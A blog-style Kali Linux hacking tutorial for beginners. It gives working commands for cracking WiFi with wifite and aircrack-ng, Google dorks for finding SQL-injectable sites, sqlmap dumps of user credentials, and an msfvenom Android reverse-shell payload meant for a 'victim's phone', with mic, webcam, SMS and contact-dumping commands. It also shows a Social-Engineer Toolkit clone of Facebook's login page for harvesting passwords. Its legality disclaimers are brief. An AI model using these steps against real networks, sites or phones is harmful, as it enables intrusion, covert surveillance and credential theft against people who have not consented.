Kali linux tutorial
Kali linux tutorial

Kali Linux Tutorial

Kali Linux tutorial – This Debian-based Linux distro comes preinstalled with 600+ pen testing tools that make your security toolbox fabulous, with Supports and updates. This is the top hacking OS for forensic cyber security featuring with live boot capability that gives a perfect environment for vulnerability checking. But kali linux has a pretty sharp learning curve, but worry not coz we got you covered with this kali linux tutorial.

Why Kali Linux?

With This Tutorial, hacking becomes much easier since you have all the tools (more than 600 pre-installed tools) you are probably ever gonna need. Others can be downloaded easily. Now, this kali linux tutorial will get you started and you’ll be hacking with the help of this tutorial before you know it.

The Problem With Beginners.

Now, I’ve been dealing with beginners since a long time (and myself was one for a long time too). What they want is magic. A tool which is easy to use, works on Windows, can be download by searching on Google and clicking on the first link we see, and will do all the hacking itself on the push of a button. Sadly, no such tool exists (lets be real, would you use Facebook if a tool existed which you could install on Windows, simply type the person’s username/mobile number/email and then just like that get his/her Facebook password?).

Hacking is an art, and it takes years of practice to master it. So how to get started? Having no idea about hacking is okay, but being a newbie with computers in general is not allowed. When I say beginner, I mean someone who has no experience with programming and with hacking methodologies. I didn’t mean someone who needs a 1 page guide on how to download a tool. If you want to be a hacker, you have to work hard. So let’s get started with this kali linux tutorial?

Installing Kali Linux

Kali Linux –  Command Line Interface (CLI)

Now, if you are really sure about becoming a hacker, you have to get used to linux, and specifically the command line interface. It is often compared to (and rightly so) to command prompt of Windows, but Linux’ CLI is much efficient and better than command prompt. What you have to do is do all the usual tasks you do in Windows in CLI of Linux. Use cd to navigate, poweroff to shutdown, etc.

Go Through The List Of All Kali Linux Tutorial Commands (HERE) <– Highly Recommended.

Some Real Hacking – Kali Linux Tutorial

Assuming you’ve gone through the above steps and are comfortable with your new hacking environment, its time to do some real hacking with Kali Linux. My recommendation would be to start by hacking a wifi, then do some penetration testing, and maybe research something on Denial of Service when you have free time.

WiFi Hacking – Kali Linux (2 Methods)

Firstly, create a wireless network to crack. Don’t use this method on others. It is illegal. Then proceed with the steps below.

1.Hacking WiFi The Easy Way: Kali Linux Tutorial (Beginners)

Wifite is a great tool which has finally made a mark in a field where high end tools like aircrack-ng failed. It made wifi hacking everyone’s piece of cake. While all its features are not independent (eg. it hacks WPS using reaver), it does what it promises, and puts hacking on autopilot.

As per this Kali Linux Tutorial says it comes with 600 tools preinstalled. This tool comes preinstallled in kali linux tutorial

 With Wifite, its as easy and simple as a single command.
wifite -wep

If you see any error at this stage move to the bottom of the page for troubleshooting tips. If your issue is not listed please comment. We reply within a day.

The -wep makes it clear to wifite that you want to hack WEP wifis only. It’ll scan the networks for you, and when you think it has scanned enough, you can tell it to stop by typing ctrl+c. It’ll then ask you which wifi to hack. In my case, I didn’t specify -wep so it shows all the wifis in range.

Kali linux tutorial

Kali Linux Tutorial – You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets) within 5 mins. Basically you can except it to hack the wifi in 10 mins approx. Notice how it automatically did the fake auth and ARP replay.

Kali Linux Tutorial

Hacking wifi with this method wasn’t fast (it took hours), but it was easy and you don’t have to do anything but wait.

Kali linux tutorial

Kali Linux Tutorial- After the process is done you can see the password in KEY section.

Wifite makes it possible for you to use any method that you want to use, by just naming it. As you saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many other attacks can be played with. A good idea would be to execute the following-

wifite -help

This will tell you about the common usage commands, which will be very useful. Here is the list of WEP commands for different attacks-

-wep         only target WEP networks [off]
-pps <num>   set the number of packets per second to inject [600]
-wept <sec>  sec to wait for each attack, 0 implies endless [600]
-chopchop    use chopchop attack      [on]
-arpreplay   use arpreplay attack     [on]
-fragment    use fragmentation attack [on]
-caffelatte  use caffe-latte attack   [on]
-p0841       use -p0841 attack        [on]
-hirte       use hirte (cfrag) attack [on]
-nofakeauth  stop attack if fake authentication fails    [off]
-wepca <n>   start cracking when number of ivs surpass n [10000]
-wepsave     save a copy of .cap files to this directory [off]

2. WiFi Hacking With Aircrack-ng suite (Pro) – Kali Linux Tutorial

  • Find Out The Name Of Your Wireless Adapter: – Kali Linux Tutorial
    Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-
    • lo – loopback. Not important.
    • eth – ethernet
    • WLAN – This is what we want.
    Now, to see all the adapters, type “ifconfig” on a terminal. See the result. Note down the wlan(0/1/2) adapter.
  • Enable Monitoring – Kali Linux Tutorial
Now, we use a tool called airmon-ng to  create a virtual interface called mon. Just type
airmon-ng start wlan0

Your monitoring interface will be created – mon0 in case of Kali 1.x, wlan0mon in all other cases.

  • Start Capturing Packets – Kali Linux Tutorial
Now, we’ll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You’ll see the name of the wifi you want to hack.
airodump-ng wlan0mon
  • Store The Captured Packets In A File – Kali Linux Tutorial
This can be achieved by giving some more parameters with the airodump command.
airodump-ng mon0 --write name_of_file

Now the captured packets will be stored in name_of_file.cap
You will have to wait till you have enough data (10000 minimum)

  • Crack The WiFi –  Tutorial

If all goes well ,then you’ll be sitting in front of your pc, reading this kali linux turial, finally you’ve got 10000 packets (don’t stop the packet capture yet). Now, you can use aircrack-ng to crack the password. (in a new terminal)

aircrack-ng name_of_file-01.cap 

The program will ask which wifi to crack, if there are multiple available. Choose the wifi. It’ll do its job. If the password is weak enough, then you’ll get it in front of you. If not, the program will tell you to get more packets. The program will retry again when there are 15000 packets, and so on.

You’ll get the key, probably in this format- Kali linux tutorial
xx:xx:xx:xx:xx
Remove the colons
xxxxxxxxxx is the password of the wireless network



Hacking A Website – Kali Linux

Let’s do some SQL Injection to get into the database of a website.

SQL Injection, How it Works? – Kali Linux Tutorial

Let’s start this kali linux tutorial by an apparently unrelated point. Lets assume we create a table in SQL. Now there are three main parts of a database management system, like SQL. They are –

  • Creating structure of table
  • Entering data
  • Making queries (and getting meaningful results from data)
So, when SQL is used to display data on a web page, it is common to let web users input their own queries. For example, if you go to a shopping website to buy a smartphone, you might want to specify what kind of smartphone you want. The site would probably be storing data about phones in table with columns like Name, Price, Company, Screen Size, OS, etc. – Kali Linux Tutorial
Now what they do is that they allow you to create a query using some sort of user friendly drop down based form which lets you select your budget, preferred company, etc. So basically, you, the user, can create queries and request data from their SQL servers without typing any code. – Kali Linux Tutorial
This automated method of creating queries for you is relatively safe (since it doesn’t give you a lot of flexibility in terms of what queries you can create, you are limited by the syntax of queries they have decided). However, there is another method of creating queries which can be exploited. – Kali Linux Tutorial
A url ending in .php is a direct indication that the website/blog uses sql to deliver a lot of it’s data, and that you can execute queries directly by changing the url. Usually the data in the SQL tables is protected and can be viewed directly only by certain people (admins etc.). However, when we send some rogue commands to the SQL server, it doesn’t understand what to do, and returns an error. – KaliLinux Tutorial
This is a clear indication that with intelligent design of URLs, we can send queries that will make the database ‘go berserk’ and malfunction, and give us all the otherwise private data of its tables. This attack can be used to obtain confidential data like a list of username and passwords of all users on a website. – Kali Linux

Hacking Websites With sqlmap – Kali Linux Turial

In this kali linux tutorial, we’ll be using Kali Linux and SqlMap (which comes preinstalled in Kali).

  • Finding A Vulnerable Website – Kali Linux Tutorial

The first step is obviously finding a vulnerable website. There are a lot of ways to do so. the most common method of searching is by using dorks.
  • Dorks – Kali linux

Dorks are an input query into a search engine (Google) which attempt to find websites with the given text provided in the dork itself. Basically it helps you to find websites with a specific code in their url which you know is a sign of vulnerability.
A more specific definition could be “Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site.” (from 1337mir)
  • Using Dorks – Kali Linux Tutorial

Now basically what a dork does is uses Google’s “inurl” command to return websites which have a specific set of vulnerable words in url. For that, we need to know which words in the url make a website potentially vulnerable to a SQL injection attack. Many websites offer a comprehensive list of google dorks. For example, the l33tmir website has a list of hundreds of google dorks. However, creativity is your best tool when it comes to finding vulnerable sites, and after practicing with some google dorks, you will be able to create your own. A few dorks have been listed below. What you have to do is paste them into the google search bar and google will return potentially vulnerable sites. – Tutorial
inurl:"products.php?prodID="

inurl:buy.php?category=

Kali Linux Tutorial – All the vulnerable sites will surely have a .php in their URL, since it is an indicator that this website uses SQL database here. After the question mark you will have a ?something= clause. What lies after the = will be our code that is known to cause malfunctioning of databases and carrying out of a Sql Injection attack.
After you have used the dork, you have a list of potentially vulnerable sites. Most of them though, may not be vulnerable (i.e not the way you want them to be, they might still be having some vulnerabilities you don’t know about yet).

  • Playing with sqlmap – Kali Linux Tutorial

In This Part of Kali Linux Tutorial lets move on to SQL MAP
Boot into your Kali linux machine. Start a terminal, and type –
sqlmap -h

It lists the basic commands that are supported by SqlMap. To start with, we’ll execute a simple command
sqlmap -u <URL to inject>. In our case, it will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Sometimes, using the –time-sec helps to speed up the process, especially when the server responses are slow.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
Either ways, when sqlmap is done, it will tell you the Mysql version and some other useful information about the database. – Kali Linux Tutorial
  • Enumerating the database – Kali Linux Tutorial

In this step, we will obtain database name, column names and other useful data from the database.

Kali Linux Tutorial
So first we will get the names of available databases. For this we will add –dbs to our previous command. The final result will look like –
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
Kali Linux Tutorial

So the two databases are acuart and information schema.

Table – Kali Linux

Now we are interested in acuart database. Information schema can be thought of as a default table which is present on all your targets, and contains information about structure of databases, tables, etc., but not the kind of information we are looking for. It can, however, be useful on a number of occasions. So, now we will specify the database of interest using -D and tell sqlmap to enlist the tables using –tables command. The final sqlmap command will be-
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
Kali Linux Tutorial

The result should be something like this – Kali Linux Tutorial
Database: acuart
[8 tables]
+———–+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+———–+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns – Kali Linux

Now we will specify the database using -D, the table using -T, and then request the columns using –columns. I hope you guys are starting to get the pattern by now. The most appealing table here is users. It might contain the username and passwords of registered users on the website (hackers always look for sensitive data).
The final command must be something like- Kali Linux Tutorial
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
The result would resemble this- Kali Linux Tutorial
Kali Linux Tutorial

Data – Kali Linux Tutorial

Now, if you were following along attentively, now we will be getting data from one of the columns. While that hypothesis is not completely wrong, its time we go one step ahead. Now we will be getting data from multiple columns. As usual, we will specify the database with -D, table with -T, and column with -C. We will get all data from specified columns using –dump. We will enter multiple columns and separate them with commas. The final command will look like this –  Tutorial
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump
Kali Linux Tutorial

Here’s the result –  Tutorial

Kali Linux Tutorial

John Smith, of course. And the password is test. Email is [email protected]?? Okay, nothing great, but in the real world web pentesting, you can come across more sensitive data. Under such circumstances, the right thing to do is mail the admin of the website and tell him to fix the vulnerability ASAP. Don’t get tempted to join the black hat side. You won’t look pretty behind the bars. Try to look at other columns and tables and see what you can dig up. –  Tutorial



  • Hacking Your First OS: Hacking Android Device –  Tutorial

in this Kali Linux Tutorial we will hack android device using msfvenom – Kali Linux Tutorial

msfvenom is a kali linux hacking tool for android ,is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance known as msfvenom payload.

STEPS : –  Tutorial

1. Fire Up kali linux and open terminal.

2. Set payload and create the custom android executable.
Command: – Tutorial

[email protected]:-# msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.110 LPORT=4444 R > andro.apk

(To know your LHOST, open new terminal and type ifconfig )

Your apk file is being saved in the Home folder.

Note: Don’t add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).

3. Transfer/mail this file (here andro.apk) file to the victim’s phone and install it.

4. Start the metasploit framework console as follows : –  Tutorial

Command: –  Tutorial

[email protected]:-# msfconsole

5. Now it’s time to open and setup multi-handler. Follows the steps : –  Tutorial

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

Payload Handler is being started. –  Tutorial

6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established. –  Tutorial

7. Try the following exploit commands :-  Tutorial

– record_mic
– webcam_snap
– webcam_stream
– dump_contacts
– dump_sms
– geolocate
************************************************************************

TROUBLESHOOTING – Error fixing(incase you get PARSE ERROR) – Kali Linux Tutorial
Two methods: –  Tutorial
1)Type command “d2j-apk-sign andro.apk
                                               or
 2) To fix this error download signapk – Click here to download
Steps to follow –  Tutorial
  1. Open Signapk folder then open Terminal.
  2. Copy the andro.apk(the app you made) in Signapk folder. And run this command in terminal
java-jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk

4. copy it in your phone and install it.

Hope this works… 🙂



BONUS : Kali Linux Tutorial

Social Engineering Toolkit: Hack Facebook – Kali Linux Tutorial

What is the actual meaning of hacking Facebook? Most of us are misguided by the term hacking in general. Hacking incorporates the attainment of someone’s password, but hacking is so much more. –  Tutorial

In general sense, when you use the term hacking Facebook, you mean to understand the functioning of the website, find out about its database management systems, scripts employed, use of cookies, language on which it is built on, etc. Then you find vulnerabilities in the working of the websites, and code exploits to break through the obstacles and gain privileges into their systems, using suitable payloads. The next step would be privilege escalation. For example, you found out a vulnerability that allows you to look into the database and see the email address and cellphone number of any user. You would want to escalate your privileges and also gain access to their passwords. The last step may be setting up a backdoor, for quicker access next time. – Kali Linux Tutorial

You wouldn’t be reading this article on beginner level hacking on Kali Linux if you had so far with web pentesting. That kid next door claims he can get Facebook password of anyone, and he’s good, but not ‘code an exploit for Facebook‘ good, no, not that good. This is where social engineering steps in. –  Tutorial

SOCIAL ENGINEERING TOOLKIT –  Tutorial

The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. –  Tutorial
  • Start Kali Linux. In a terminal type – Kali Linux
se-toolkit.
  • Something like this will show up

[email protected]:~# se-toolkit
[-] New set_config.py file generated on: 2017-05-26 08:26:33.526119
[-] Verifying configuration update…
[*] Update verified, config timestamp is: 2017-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart
  [—]        The Social-Engineer Toolkit (SET)         [—]       
  [—]        Created by: David Kennedy (ReL1K)         [—]
  [—]                 Version: 4.3.9                   [—]
  [—]              Codename: ‘Turbulence’              [—]
  [—]         Follow us on Twitter: @trustedsec        [—]
  [—]         Follow me on Twitter: @dave_rel1k        [—]
  [—]       Homepage: https://www.trustedsec.com       [—]
     
 Select from the menu:
   1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About
  99) Exit the Social-Engineer Toolkit
set> 

Now type the following and press enter.
1 [enter] 2 [enter] 3 [enter]

Explanation –  Tutorial

  • 1 selects social engineering attacks. Obvious choice if you read the other options from 1 to 9 (and 99 for exit)
  • The 2 selects Website Attack Vectors. Not that obvious.  The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
  • Then, the 3 selects Credential Harvestor.  The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.

Now you’ll be seeing something like this- Kali Linux Tutorial

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu

Type 2 to select site cloner.

Find your IP –  Tutorial

On a new terminal type ifconfig. This will give you your ipv4 address, which is what you are looking for

Back to se-toolkit – Tutorial

Now it’ll ask you to specify the IP to which the data is supposed to be sent to. That’ll be your IP address. Since this is your internal IP address (i.e. local IP), the fake facebook page will work only for computers connected with your LAN.

Now it’ll ask for the page to be cloned. Enter https://www.facebook.com/.

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/

Now in your browser on Kali Linux, enter your IP. It will display facebook login page. Enter any info and press login. You will get the information in se-toolkit. If you are using VMWare or virtualbox, then you can try and enter the IP on the browsers there. It will work.

Live demonstration – Kali Linux Tutorial

To make sure that the demonstration is not just a repetition of what you already know, I have decided to clone the login page of facebook, instead of homepage. It will be a tad bit different. Here is a screenshot of what I did. – Kali Linux Tutorial
Kali Linux Tutorial
The IP address is my internal address from ifconfig, which comes out to be 192.168.154.133. The cloned page is https://www.facebook.com/login.php. Now we will try to see if this credential harvestor works. – Kali Linux Tutorial

On Kali Linux Machine –  Tutorial

Kali Linux Tutorial

Entering the IP in browser shows you the fake login page. Also, se-toolkit registers the visit and says 192.168.154.133

Now if we enter something in the field, it also shows up on se-toolkit. I entered ‘hackingwithkalilinux’ in username field and ‘password’ in password field. This is what se-toolkit shows-
Kali Linux Tutorial

POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password

Conclusion : Using This Tutorial method you can get pretty much Anyone’s username and Password over LAN.

If you have something to add in this tutorial drop ur thoughts in comments.

RECOMMENDED: 9 Ebooks To Master Kali Linux [FREE DOWNLOAD]

1 COMMENT

LEAVE A REPLY

Please enter your comment!
Please enter your name here